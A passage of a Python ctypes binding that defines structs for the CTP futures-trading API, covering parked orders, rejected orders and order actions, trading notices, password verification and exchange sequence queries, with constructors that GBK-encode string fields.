    def __init__(self, BrokerID=None, InvestorID=None, InstrumentID=None, OrderRef=None, UserID=None, OrderPriceType=None, Direction=None, CombOffsetFlag=None, CombHedgeFlag=None, LimitPrice=None, VolumeTotalOriginal=None, TimeCondition=None, GTDDate=None, VolumeCondition=None, MinVolume=None, ContingentCondition=None, StopPrice=None, ForceCloseReason=None, IsAutoSuspend=None, BusinessUnit=None, RequestID=None, UserForceClose=None, ExchangeID=None, ParkedOrderID=None, UserType=None, Status=None, ErrorID=None, ErrorMsg=None, IsSwapOrder=None, AccountID=None, CurrencyID=None, ClientID=None, InvestUnitID=None, IPAddress=None, MacAddress=None):
        """Set only explicitly-passed fields; None keeps the ctypes zero default.

        `is not None` (not truthiness) so falsy values like 0 / 0.0 / "" are
        honored (e.g. an explicit LimitPrice of 0.0 or ErrorID of 0); str
        values are GBK-encoded, bytes are accepted as-is.
        """
        super().__init__()
        for _name, _value in (
            ("BrokerID", BrokerID),
            ("InvestorID", InvestorID),
            ("InstrumentID", InstrumentID),
            ("OrderRef", OrderRef),
            ("UserID", UserID),
            ("OrderPriceType", OrderPriceType),
            ("Direction", Direction),
            ("CombOffsetFlag", CombOffsetFlag),
            ("CombHedgeFlag", CombHedgeFlag),
            ("LimitPrice", LimitPrice),
            ("VolumeTotalOriginal", VolumeTotalOriginal),
            ("TimeCondition", TimeCondition),
            ("GTDDate", GTDDate),
            ("VolumeCondition", VolumeCondition),
            ("MinVolume", MinVolume),
            ("ContingentCondition", ContingentCondition),
            ("StopPrice", StopPrice),
            ("ForceCloseReason", ForceCloseReason),
            ("IsAutoSuspend", IsAutoSuspend),
            ("BusinessUnit", BusinessUnit),
            ("RequestID", RequestID),
            ("UserForceClose", UserForceClose),
            ("ExchangeID", ExchangeID),
            ("ParkedOrderID", ParkedOrderID),
            ("UserType", UserType),
            ("Status", Status),
            ("ErrorID", ErrorID),
            ("ErrorMsg", ErrorMsg),
            ("IsSwapOrder", IsSwapOrder),
            ("AccountID", AccountID),
            ("CurrencyID", CurrencyID),
            ("ClientID", ClientID),
            ("InvestUnitID", InvestUnitID),
            ("IPAddress", IPAddress),
            ("MacAddress", MacAddress),
        ):
            if _value is not None:
                setattr(self, _name, _value.encode("GBK") if isinstance(_value, str) else _value)
class ParkedOrderAction(Struct):
    """A parked cancel/modify action for an order; strings stored GBK-encoded."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("OrderActionRef", c_int),
        ("OrderRef", c_char_Array_13),
        ("RequestID", c_int),
        ("FrontID", c_int),
        ("SessionID", c_int),
        ("ExchangeID", c_char_Array_9),
        ("OrderSysID", c_char_Array_21),
        ("ActionFlag", c_char),
        ("LimitPrice", c_double),
        ("VolumeChange", c_int),
        ("UserID", c_char_Array_16),
        ("InstrumentID", c_char_Array_31),
        ("ParkedOrderActionID", c_char_Array_13),
        ("UserType", c_char),
        ("Status", c_char),
        ("ErrorID", c_int),
        ("ErrorMsg", c_char_Array_81),
        ("InvestUnitID", c_char_Array_17),
        ("IPAddress", c_char_Array_16),
        ("MacAddress", c_char_Array_21),
    ]
    def __init__(self, BrokerID=None, InvestorID=None, OrderActionRef=None, OrderRef=None, RequestID=None, FrontID=None, SessionID=None, ExchangeID=None, OrderSysID=None, ActionFlag=None, LimitPrice=None, VolumeChange=None, UserID=None, InstrumentID=None, ParkedOrderActionID=None, UserType=None, Status=None, ErrorID=None, ErrorMsg=None, InvestUnitID=None, IPAddress=None, MacAddress=None):
        """Set only explicitly-passed fields; None keeps the ctypes zero default.

        `is not None` (not truthiness) so falsy values like 0 / 0.0 / "" are
        honored; str values are GBK-encoded, bytes are accepted as-is.
        """
        super().__init__()
        for _name, _value in (
            ("BrokerID", BrokerID),
            ("InvestorID", InvestorID),
            ("OrderActionRef", OrderActionRef),
            ("OrderRef", OrderRef),
            ("RequestID", RequestID),
            ("FrontID", FrontID),
            ("SessionID", SessionID),
            ("ExchangeID", ExchangeID),
            ("OrderSysID", OrderSysID),
            ("ActionFlag", ActionFlag),
            ("LimitPrice", LimitPrice),
            ("VolumeChange", VolumeChange),
            ("UserID", UserID),
            ("InstrumentID", InstrumentID),
            ("ParkedOrderActionID", ParkedOrderActionID),
            ("UserType", UserType),
            ("Status", Status),
            ("ErrorID", ErrorID),
            ("ErrorMsg", ErrorMsg),
            ("InvestUnitID", InvestUnitID),
            ("IPAddress", IPAddress),
            ("MacAddress", MacAddress),
        ):
            if _value is not None:
                setattr(self, _name, _value.encode("GBK") if isinstance(_value, str) else _value)
class QryParkedOrder(Struct):
    """Query filter for parked orders; strings stored GBK-encoded."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("InstrumentID", c_char_Array_31),
        ("ExchangeID", c_char_Array_9),
        ("InvestUnitID", c_char_Array_17),
    ]
    def __init__(self, BrokerID=None, InvestorID=None, InstrumentID=None, ExchangeID=None, InvestUnitID=None):
        """Set only explicitly-passed fields; None keeps the ctypes zero default."""
        super().__init__()
        # `is not None` so an explicit empty string is still assigned.
        for _name, _value in (
            ("BrokerID", BrokerID),
            ("InvestorID", InvestorID),
            ("InstrumentID", InstrumentID),
            ("ExchangeID", ExchangeID),
            ("InvestUnitID", InvestUnitID),
        ):
            if _value is not None:
                setattr(self, _name, _value.encode("GBK") if isinstance(_value, str) else _value)
class QryParkedOrderAction(Struct):
    """Query filter for parked order actions; strings stored GBK-encoded."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("InstrumentID", c_char_Array_31),
        ("ExchangeID", c_char_Array_9),
        ("InvestUnitID", c_char_Array_17),
    ]
    def __init__(self, BrokerID=None, InvestorID=None, InstrumentID=None, ExchangeID=None, InvestUnitID=None):
        """Set only explicitly-passed fields; None keeps the ctypes zero default."""
        super().__init__()
        # `is not None` so an explicit empty string is still assigned.
        for _name, _value in (
            ("BrokerID", BrokerID),
            ("InvestorID", InvestorID),
            ("InstrumentID", InstrumentID),
            ("ExchangeID", ExchangeID),
            ("InvestUnitID", InvestUnitID),
        ):
            if _value is not None:
                setattr(self, _name, _value.encode("GBK") if isinstance(_value, str) else _value)
class RemoveParkedOrder(Struct):
    """Request to delete a parked order; strings stored GBK-encoded."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("ParkedOrderID", c_char_Array_13),
        ("InvestUnitID", c_char_Array_17),
    ]
    def __init__(self, BrokerID=None, InvestorID=None, ParkedOrderID=None, InvestUnitID=None):
        """Set only explicitly-passed fields; None keeps the ctypes zero default."""
        super().__init__()
        # `is not None` so an explicit empty string is still assigned.
        for _name, _value in (
            ("BrokerID", BrokerID),
            ("InvestorID", InvestorID),
            ("ParkedOrderID", ParkedOrderID),
            ("InvestUnitID", InvestUnitID),
        ):
            if _value is not None:
                setattr(self, _name, _value.encode("GBK") if isinstance(_value, str) else _value)
class RemoveParkedOrderAction(Struct):
    """Request to delete a parked order action; strings stored GBK-encoded."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("ParkedOrderActionID", c_char_Array_13),
        ("InvestUnitID", c_char_Array_17),
    ]
    def __init__(self, BrokerID=None, InvestorID=None, ParkedOrderActionID=None, InvestUnitID=None):
        """Set only explicitly-passed fields; None keeps the ctypes zero default."""
        super().__init__()
        # `is not None` so an explicit empty string is still assigned.
        for _name, _value in (
            ("BrokerID", BrokerID),
            ("InvestorID", InvestorID),
            ("ParkedOrderActionID", ParkedOrderActionID),
            ("InvestUnitID", InvestUnitID),
        ):
            if _value is not None:
                setattr(self, _name, _value.encode("GBK") if isinstance(_value, str) else _value)
class InvestorWithdrawAlgorithm(Struct):
    """Investor-level withdrawal algorithm configuration; strings stored GBK-encoded."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InvestorRange", c_char),
        ("InvestorID", c_char_Array_13),
        ("UsingRatio", c_double),
        ("CurrencyID", c_char_Array_4),
        ("FundMortgageRatio", c_double),
    ]
    def __init__(self, BrokerID=None, InvestorRange=None, InvestorID=None, UsingRatio=None, CurrencyID=None, FundMortgageRatio=None):
        """Set only explicitly-passed fields; None keeps the ctypes zero default.

        `is not None` (not truthiness) so an explicit 0.0 ratio is honored.
        """
        super().__init__()
        for _name, _value in (
            ("BrokerID", BrokerID),
            ("InvestorRange", InvestorRange),
            ("InvestorID", InvestorID),
            ("UsingRatio", UsingRatio),
            ("CurrencyID", CurrencyID),
            ("FundMortgageRatio", FundMortgageRatio),
        ):
            if _value is not None:
                setattr(self, _name, _value.encode("GBK") if isinstance(_value, str) else _value)
class QryInvestorPositionCombineDetail(Struct):
    """Query filter for combined position details; strings stored GBK-encoded."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("CombInstrumentID", c_char_Array_31),
        ("ExchangeID", c_char_Array_9),
        ("InvestUnitID", c_char_Array_17),
    ]
    def __init__(self, BrokerID=None, InvestorID=None, CombInstrumentID=None, ExchangeID=None, InvestUnitID=None):
        """Set only explicitly-passed fields; None keeps the ctypes zero default."""
        super().__init__()
        # `is not None` so an explicit empty string is still assigned.
        for _name, _value in (
            ("BrokerID", BrokerID),
            ("InvestorID", InvestorID),
            ("CombInstrumentID", CombInstrumentID),
            ("ExchangeID", ExchangeID),
            ("InvestUnitID", InvestUnitID),
        ):
            if _value is not None:
                setattr(self, _name, _value.encode("GBK") if isinstance(_value, str) else _value)
class MarketDataAveragePrice(Struct):
    """Average-price portion of a market-data snapshot."""
    _fields_ = [
        ("AveragePrice", c_double),
    ]
    def __init__(self, AveragePrice=None):
        """Set AveragePrice if passed; None keeps the ctypes zero default.

        `is not None` (not truthiness) so an explicit 0.0 is honored.
        """
        super().__init__()
        if AveragePrice is not None:
            self.AveragePrice = AveragePrice
class VerifyInvestorPassword(Struct):
    """CTP request struct: verify an investor's password."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("Password", c_char_Array_41),
    ]
    def __init__(self, BrokerID=None, InvestorID=None, Password=None):
        super().__init__()
        # Only truthy strings are stored, GBK-encoded for the C API.
        for name, text in (
            ("BrokerID", BrokerID),
            ("InvestorID", InvestorID),
            ("Password", Password),
        ):
            if text:
                setattr(self, name, text.encode("GBK"))
class UserIP(Struct):
    """CTP struct: a user's registered IP / MAC address record."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("UserID", c_char_Array_16),
        ("IPAddress", c_char_Array_16),
        ("IPMask", c_char_Array_16),
        ("MacAddress", c_char_Array_21),
    ]
    def __init__(self, BrokerID=None, UserID=None, IPAddress=None, IPMask=None, MacAddress=None):
        super().__init__()
        # Only truthy strings are stored, GBK-encoded for the C API.
        for name, text in (
            ("BrokerID", BrokerID),
            ("UserID", UserID),
            ("IPAddress", IPAddress),
            ("IPMask", IPMask),
            ("MacAddress", MacAddress),
        ):
            if text:
                setattr(self, name, text.encode("GBK"))
class TradingNoticeInfo(Struct):
    """CTP struct: a single trading-notice message delivered to an investor."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("SendTime", c_char_Array_9),
        ("FieldContent", c_char_Array_501),
        ("SequenceSeries", c_short),
        ("SequenceNo", c_int),
        ("InvestUnitID", c_char_Array_17),
    ]
    def __init__(self, BrokerID=None, InvestorID=None, SendTime=None, FieldContent=None, SequenceSeries=None, SequenceNo=None, InvestUnitID=None):
        super().__init__()
        # Only truthy values are stored; text fields are GBK-encoded for the C API.
        for name, value, is_text in (
            ("BrokerID", BrokerID, True),
            ("InvestorID", InvestorID, True),
            ("SendTime", SendTime, True),
            ("FieldContent", FieldContent, True),
            ("SequenceSeries", SequenceSeries, False),
            ("SequenceNo", SequenceNo, False),
            ("InvestUnitID", InvestUnitID, True),
        ):
            if value:
                setattr(self, name, value.encode("GBK") if is_text else value)
class TradingNotice(Struct):
    """CTP struct: a trading notice addressed to an investor range."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InvestorRange", c_char),
        ("InvestorID", c_char_Array_13),
        ("SequenceSeries", c_short),
        ("UserID", c_char_Array_16),
        ("SendTime", c_char_Array_9),
        ("SequenceNo", c_int),
        ("FieldContent", c_char_Array_501),
        ("InvestUnitID", c_char_Array_17),
    ]
    def __init__(self, BrokerID=None, InvestorRange=None, InvestorID=None, SequenceSeries=None, UserID=None, SendTime=None, SequenceNo=None, FieldContent=None, InvestUnitID=None):
        super().__init__()
        # Only truthy values are stored; text fields are GBK-encoded for the C API.
        for name, value, is_text in (
            ("BrokerID", BrokerID, True),
            ("InvestorRange", InvestorRange, True),
            ("InvestorID", InvestorID, True),
            ("SequenceSeries", SequenceSeries, False),
            ("UserID", UserID, True),
            ("SendTime", SendTime, True),
            ("SequenceNo", SequenceNo, False),
            ("FieldContent", FieldContent, True),
            ("InvestUnitID", InvestUnitID, True),
        ):
            if value:
                setattr(self, name, value.encode("GBK") if is_text else value)
class QryTradingNotice(Struct):
    """CTP request struct: query trading notices for an investor."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("InvestUnitID", c_char_Array_17),
    ]
    def __init__(self, BrokerID=None, InvestorID=None, InvestUnitID=None):
        super().__init__()
        # Only truthy strings are stored, GBK-encoded for the C API.
        for name, text in (
            ("BrokerID", BrokerID),
            ("InvestorID", InvestorID),
            ("InvestUnitID", InvestUnitID),
        ):
            if text:
                setattr(self, name, text.encode("GBK"))
class QryErrOrder(Struct):
    """CTP request struct: query erroneous orders for an investor."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
    ]
    def __init__(self, BrokerID=None, InvestorID=None):
        super().__init__()
        # Only truthy strings are stored, GBK-encoded for the C API.
        for name, text in (("BrokerID", BrokerID), ("InvestorID", InvestorID)):
            if text:
                setattr(self, name, text.encode("GBK"))
class ErrOrder(Struct):
    """CTP struct: an order-insert request that was rejected, plus its error info."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("InstrumentID", c_char_Array_31),
        ("OrderRef", c_char_Array_13),
        ("UserID", c_char_Array_16),
        ("OrderPriceType", c_char),
        ("Direction", c_char),
        ("CombOffsetFlag", c_char_Array_5),
        ("CombHedgeFlag", c_char_Array_5),
        ("LimitPrice", c_double),
        ("VolumeTotalOriginal", c_int),
        ("TimeCondition", c_char),
        ("GTDDate", c_char_Array_9),
        ("VolumeCondition", c_char),
        ("MinVolume", c_int),
        ("ContingentCondition", c_char),
        ("StopPrice", c_double),
        ("ForceCloseReason", c_char),
        ("IsAutoSuspend", c_int),
        ("BusinessUnit", c_char_Array_21),
        ("RequestID", c_int),
        ("UserForceClose", c_int),
        ("ErrorID", c_int),
        ("ErrorMsg", c_char_Array_81),
        ("IsSwapOrder", c_int),
        ("ExchangeID", c_char_Array_9),
        ("InvestUnitID", c_char_Array_17),
        ("AccountID", c_char_Array_13),
        ("CurrencyID", c_char_Array_4),
        ("ClientID", c_char_Array_11),
        ("IPAddress", c_char_Array_16),
        ("MacAddress", c_char_Array_21),
    ]
    def __init__(self, BrokerID=None, InvestorID=None, InstrumentID=None, OrderRef=None, UserID=None, OrderPriceType=None, Direction=None, CombOffsetFlag=None, CombHedgeFlag=None, LimitPrice=None, VolumeTotalOriginal=None, TimeCondition=None, GTDDate=None, VolumeCondition=None, MinVolume=None, ContingentCondition=None, StopPrice=None, ForceCloseReason=None, IsAutoSuspend=None, BusinessUnit=None, RequestID=None, UserForceClose=None, ErrorID=None, ErrorMsg=None, IsSwapOrder=None, ExchangeID=None, InvestUnitID=None, AccountID=None, CurrencyID=None, ClientID=None, IPAddress=None, MacAddress=None):
        super().__init__()
        # Table-driven assignment: only truthy values are stored; the third tuple
        # element marks text fields, which are GBK-encoded for the C API.
        for name, value, is_text in (
            ("BrokerID", BrokerID, True),
            ("InvestorID", InvestorID, True),
            ("InstrumentID", InstrumentID, True),
            ("OrderRef", OrderRef, True),
            ("UserID", UserID, True),
            ("OrderPriceType", OrderPriceType, True),
            ("Direction", Direction, True),
            ("CombOffsetFlag", CombOffsetFlag, True),
            ("CombHedgeFlag", CombHedgeFlag, True),
            ("LimitPrice", LimitPrice, False),
            ("VolumeTotalOriginal", VolumeTotalOriginal, False),
            ("TimeCondition", TimeCondition, True),
            ("GTDDate", GTDDate, True),
            ("VolumeCondition", VolumeCondition, True),
            ("MinVolume", MinVolume, False),
            ("ContingentCondition", ContingentCondition, True),
            ("StopPrice", StopPrice, False),
            ("ForceCloseReason", ForceCloseReason, True),
            ("IsAutoSuspend", IsAutoSuspend, False),
            ("BusinessUnit", BusinessUnit, True),
            ("RequestID", RequestID, False),
            ("UserForceClose", UserForceClose, False),
            ("ErrorID", ErrorID, False),
            ("ErrorMsg", ErrorMsg, True),
            ("IsSwapOrder", IsSwapOrder, False),
            ("ExchangeID", ExchangeID, True),
            ("InvestUnitID", InvestUnitID, True),
            ("AccountID", AccountID, True),
            ("CurrencyID", CurrencyID, True),
            ("ClientID", ClientID, True),
            ("IPAddress", IPAddress, True),
            ("MacAddress", MacAddress, True),
        ):
            if value:
                setattr(self, name, value.encode("GBK") if is_text else value)
class ErrorConditionalOrder(Struct):
    """CTP struct: a conditional order together with its full exchange state and error info."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("InstrumentID", c_char_Array_31),
        ("OrderRef", c_char_Array_13),
        ("UserID", c_char_Array_16),
        ("OrderPriceType", c_char),
        ("Direction", c_char),
        ("CombOffsetFlag", c_char_Array_5),
        ("CombHedgeFlag", c_char_Array_5),
        ("LimitPrice", c_double),
        ("VolumeTotalOriginal", c_int),
        ("TimeCondition", c_char),
        ("GTDDate", c_char_Array_9),
        ("VolumeCondition", c_char),
        ("MinVolume", c_int),
        ("ContingentCondition", c_char),
        ("StopPrice", c_double),
        ("ForceCloseReason", c_char),
        ("IsAutoSuspend", c_int),
        ("BusinessUnit", c_char_Array_21),
        ("RequestID", c_int),
        ("OrderLocalID", c_char_Array_13),
        ("ExchangeID", c_char_Array_9),
        ("ParticipantID", c_char_Array_11),
        ("ClientID", c_char_Array_11),
        ("ExchangeInstID", c_char_Array_31),
        ("TraderID", c_char_Array_21),
        ("InstallID", c_int),
        ("OrderSubmitStatus", c_char),
        ("NotifySequence", c_int),
        ("TradingDay", c_char_Array_9),
        ("SettlementID", c_int),
        ("OrderSysID", c_char_Array_21),
        ("OrderSource", c_char),
        ("OrderStatus", c_char),
        ("OrderType", c_char),
        ("VolumeTraded", c_int),
        ("VolumeTotal", c_int),
        ("InsertDate", c_char_Array_9),
        ("InsertTime", c_char_Array_9),
        ("ActiveTime", c_char_Array_9),
        ("SuspendTime", c_char_Array_9),
        ("UpdateTime", c_char_Array_9),
        ("CancelTime", c_char_Array_9),
        ("ActiveTraderID", c_char_Array_21),
        ("ClearingPartID", c_char_Array_11),
        ("SequenceNo", c_int),
        ("FrontID", c_int),
        ("SessionID", c_int),
        ("UserProductInfo", c_char_Array_11),
        ("StatusMsg", c_char_Array_81),
        ("UserForceClose", c_int),
        ("ActiveUserID", c_char_Array_16),
        ("BrokerOrderSeq", c_int),
        ("RelativeOrderSysID", c_char_Array_21),
        ("ZCETotalTradedVolume", c_int),
        ("ErrorID", c_int),
        ("ErrorMsg", c_char_Array_81),
        ("IsSwapOrder", c_int),
        ("BranchID", c_char_Array_9),
        ("InvestUnitID", c_char_Array_17),
        ("AccountID", c_char_Array_13),
        ("CurrencyID", c_char_Array_4),
        ("IPAddress", c_char_Array_16),
        ("MacAddress", c_char_Array_21),
    ]
    def __init__(self, BrokerID=None, InvestorID=None, InstrumentID=None, OrderRef=None, UserID=None, OrderPriceType=None, Direction=None, CombOffsetFlag=None, CombHedgeFlag=None, LimitPrice=None, VolumeTotalOriginal=None, TimeCondition=None, GTDDate=None, VolumeCondition=None, MinVolume=None, ContingentCondition=None, StopPrice=None, ForceCloseReason=None, IsAutoSuspend=None, BusinessUnit=None, RequestID=None, OrderLocalID=None, ExchangeID=None, ParticipantID=None, ClientID=None, ExchangeInstID=None, TraderID=None, InstallID=None, OrderSubmitStatus=None, NotifySequence=None, TradingDay=None, SettlementID=None, OrderSysID=None, OrderSource=None, OrderStatus=None, OrderType=None, VolumeTraded=None, VolumeTotal=None, InsertDate=None, InsertTime=None, ActiveTime=None, SuspendTime=None, UpdateTime=None, CancelTime=None, ActiveTraderID=None, ClearingPartID=None, SequenceNo=None, FrontID=None, SessionID=None, UserProductInfo=None, StatusMsg=None, UserForceClose=None, ActiveUserID=None, BrokerOrderSeq=None, RelativeOrderSysID=None, ZCETotalTradedVolume=None, ErrorID=None, ErrorMsg=None, IsSwapOrder=None, BranchID=None, InvestUnitID=None, AccountID=None, CurrencyID=None, IPAddress=None, MacAddress=None):
        super().__init__()
        # Table-driven assignment: only truthy values are stored; the third tuple
        # element marks text fields, which are GBK-encoded for the C API.
        for name, value, is_text in (
            ("BrokerID", BrokerID, True),
            ("InvestorID", InvestorID, True),
            ("InstrumentID", InstrumentID, True),
            ("OrderRef", OrderRef, True),
            ("UserID", UserID, True),
            ("OrderPriceType", OrderPriceType, True),
            ("Direction", Direction, True),
            ("CombOffsetFlag", CombOffsetFlag, True),
            ("CombHedgeFlag", CombHedgeFlag, True),
            ("LimitPrice", LimitPrice, False),
            ("VolumeTotalOriginal", VolumeTotalOriginal, False),
            ("TimeCondition", TimeCondition, True),
            ("GTDDate", GTDDate, True),
            ("VolumeCondition", VolumeCondition, True),
            ("MinVolume", MinVolume, False),
            ("ContingentCondition", ContingentCondition, True),
            ("StopPrice", StopPrice, False),
            ("ForceCloseReason", ForceCloseReason, True),
            ("IsAutoSuspend", IsAutoSuspend, False),
            ("BusinessUnit", BusinessUnit, True),
            ("RequestID", RequestID, False),
            ("OrderLocalID", OrderLocalID, True),
            ("ExchangeID", ExchangeID, True),
            ("ParticipantID", ParticipantID, True),
            ("ClientID", ClientID, True),
            ("ExchangeInstID", ExchangeInstID, True),
            ("TraderID", TraderID, True),
            ("InstallID", InstallID, False),
            ("OrderSubmitStatus", OrderSubmitStatus, True),
            ("NotifySequence", NotifySequence, False),
            ("TradingDay", TradingDay, True),
            ("SettlementID", SettlementID, False),
            ("OrderSysID", OrderSysID, True),
            ("OrderSource", OrderSource, True),
            ("OrderStatus", OrderStatus, True),
            ("OrderType", OrderType, True),
            ("VolumeTraded", VolumeTraded, False),
            ("VolumeTotal", VolumeTotal, False),
            ("InsertDate", InsertDate, True),
            ("InsertTime", InsertTime, True),
            ("ActiveTime", ActiveTime, True),
            ("SuspendTime", SuspendTime, True),
            ("UpdateTime", UpdateTime, True),
            ("CancelTime", CancelTime, True),
            ("ActiveTraderID", ActiveTraderID, True),
            ("ClearingPartID", ClearingPartID, True),
            ("SequenceNo", SequenceNo, False),
            ("FrontID", FrontID, False),
            ("SessionID", SessionID, False),
            ("UserProductInfo", UserProductInfo, True),
            ("StatusMsg", StatusMsg, True),
            ("UserForceClose", UserForceClose, False),
            ("ActiveUserID", ActiveUserID, True),
            ("BrokerOrderSeq", BrokerOrderSeq, False),
            ("RelativeOrderSysID", RelativeOrderSysID, True),
            ("ZCETotalTradedVolume", ZCETotalTradedVolume, False),
            ("ErrorID", ErrorID, False),
            ("ErrorMsg", ErrorMsg, True),
            ("IsSwapOrder", IsSwapOrder, False),
            ("BranchID", BranchID, True),
            ("InvestUnitID", InvestUnitID, True),
            ("AccountID", AccountID, True),
            ("CurrencyID", CurrencyID, True),
            ("IPAddress", IPAddress, True),
            ("MacAddress", MacAddress, True),
        ):
            if value:
                setattr(self, name, value.encode("GBK") if is_text else value)
class QryErrOrderAction(Struct):
    """CTP request struct: query erroneous order actions for an investor."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
    ]
    def __init__(self, BrokerID=None, InvestorID=None):
        super().__init__()
        # Only truthy strings are stored, GBK-encoded for the C API.
        for name, text in (("BrokerID", BrokerID), ("InvestorID", InvestorID)):
            if text:
                setattr(self, name, text.encode("GBK"))
class ErrOrderAction(Struct):
    """CTP struct: an order-action (cancel/modify) request that failed, plus its error info."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("OrderActionRef", c_int),
        ("OrderRef", c_char_Array_13),
        ("RequestID", c_int),
        ("FrontID", c_int),
        ("SessionID", c_int),
        ("ExchangeID", c_char_Array_9),
        ("OrderSysID", c_char_Array_21),
        ("ActionFlag", c_char),
        ("LimitPrice", c_double),
        ("VolumeChange", c_int),
        ("ActionDate", c_char_Array_9),
        ("ActionTime", c_char_Array_9),
        ("TraderID", c_char_Array_21),
        ("InstallID", c_int),
        ("OrderLocalID", c_char_Array_13),
        ("ActionLocalID", c_char_Array_13),
        ("ParticipantID", c_char_Array_11),
        ("ClientID", c_char_Array_11),
        ("BusinessUnit", c_char_Array_21),
        ("OrderActionStatus", c_char),
        ("UserID", c_char_Array_16),
        ("StatusMsg", c_char_Array_81),
        ("InstrumentID", c_char_Array_31),
        ("BranchID", c_char_Array_9),
        ("InvestUnitID", c_char_Array_17),
        ("IPAddress", c_char_Array_16),
        ("MacAddress", c_char_Array_21),
        ("ErrorID", c_int),
        ("ErrorMsg", c_char_Array_81),
    ]
    def __init__(self, BrokerID=None, InvestorID=None, OrderActionRef=None, OrderRef=None, RequestID=None, FrontID=None, SessionID=None, ExchangeID=None, OrderSysID=None, ActionFlag=None, LimitPrice=None, VolumeChange=None, ActionDate=None, ActionTime=None, TraderID=None, InstallID=None, OrderLocalID=None, ActionLocalID=None, ParticipantID=None, ClientID=None, BusinessUnit=None, OrderActionStatus=None, UserID=None, StatusMsg=None, InstrumentID=None, BranchID=None, InvestUnitID=None, IPAddress=None, MacAddress=None, ErrorID=None, ErrorMsg=None):
        super().__init__()
        # Table-driven assignment: only truthy values are stored; the third tuple
        # element marks text fields, which are GBK-encoded for the C API.
        for name, value, is_text in (
            ("BrokerID", BrokerID, True),
            ("InvestorID", InvestorID, True),
            ("OrderActionRef", OrderActionRef, False),
            ("OrderRef", OrderRef, True),
            ("RequestID", RequestID, False),
            ("FrontID", FrontID, False),
            ("SessionID", SessionID, False),
            ("ExchangeID", ExchangeID, True),
            ("OrderSysID", OrderSysID, True),
            ("ActionFlag", ActionFlag, True),
            ("LimitPrice", LimitPrice, False),
            ("VolumeChange", VolumeChange, False),
            ("ActionDate", ActionDate, True),
            ("ActionTime", ActionTime, True),
            ("TraderID", TraderID, True),
            ("InstallID", InstallID, False),
            ("OrderLocalID", OrderLocalID, True),
            ("ActionLocalID", ActionLocalID, True),
            ("ParticipantID", ParticipantID, True),
            ("ClientID", ClientID, True),
            ("BusinessUnit", BusinessUnit, True),
            ("OrderActionStatus", OrderActionStatus, True),
            ("UserID", UserID, True),
            ("StatusMsg", StatusMsg, True),
            ("InstrumentID", InstrumentID, True),
            ("BranchID", BranchID, True),
            ("InvestUnitID", InvestUnitID, True),
            ("IPAddress", IPAddress, True),
            ("MacAddress", MacAddress, True),
            ("ErrorID", ErrorID, False),
            ("ErrorMsg", ErrorMsg, True),
        ):
            if value:
                setattr(self, name, value.encode("GBK") if is_text else value)
class QryExchangeSequence(Struct):
    """CTP request struct: query an exchange's sequence state."""
    _fields_ = [
        ("ExchangeID", c_char_Array_9),
    ]
    def __init__(self, ExchangeID=None):
        super().__init__()
        # A truthy exchange code is stored GBK-encoded for the C API.
        if ExchangeID:
            self.ExchangeID = ExchangeID.encode("GBK")
class ExchangeSequence(Struct):
    """CTP struct: an exchange's message sequence number and market status."""
    _fields_ = [
        ("ExchangeID", c_char_Array_9),
        ("SequenceNo", c_int),
        ("MarketStatus", c_char),
    ]
    def __init__(self, ExchangeID=None, SequenceNo=None, MarketStatus=None):
        super().__init__()
        # Only truthy values are stored; text fields are GBK-encoded for the C API.
        for name, value, is_text in (
            ("ExchangeID", ExchangeID, True),
            ("SequenceNo", SequenceNo, False),
            ("MarketStatus", MarketStatus, True),
        ):
            if value:
                setattr(self, name, value.encode("GBK") if is_text else value)
class QueryMaxOrderVolumeWithPrice(Struct):
    """CTP request struct: query the maximum order volume at a given price."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("InstrumentID", c_char_Array_31),
        ("Direction", c_char),
        ("OffsetFlag", c_char),
        ("HedgeFlag", c_char),
        ("MaxVolume", c_int),
        ("Price", c_double),
        ("ExchangeID", c_char_Array_9),
        ("InvestUnitID", c_char_Array_17),
    ]
    def __init__(self, BrokerID=None, InvestorID=None, InstrumentID=None, Direction=None, OffsetFlag=None, HedgeFlag=None, MaxVolume=None, Price=None, ExchangeID=None, InvestUnitID=None):
        super().__init__()
        # Only truthy values are stored; text fields are GBK-encoded for the C API.
        for name, value, is_text in (
            ("BrokerID", BrokerID, True),
            ("InvestorID", InvestorID, True),
            ("InstrumentID", InstrumentID, True),
            ("Direction", Direction, True),
            ("OffsetFlag", OffsetFlag, True),
            ("HedgeFlag", HedgeFlag, True),
            ("MaxVolume", MaxVolume, False),
            ("Price", Price, False),
            ("ExchangeID", ExchangeID, True),
            ("InvestUnitID", InvestUnitID, True),
        ):
            if value:
                setattr(self, name, value.encode("GBK") if is_text else value)
class QryBrokerTradingParams(Struct):
    """CTP request struct: query broker trading parameters for an account."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("CurrencyID", c_char_Array_4),
        ("AccountID", c_char_Array_13),
    ]
    def __init__(self, BrokerID=None, InvestorID=None, CurrencyID=None, AccountID=None):
        super().__init__()
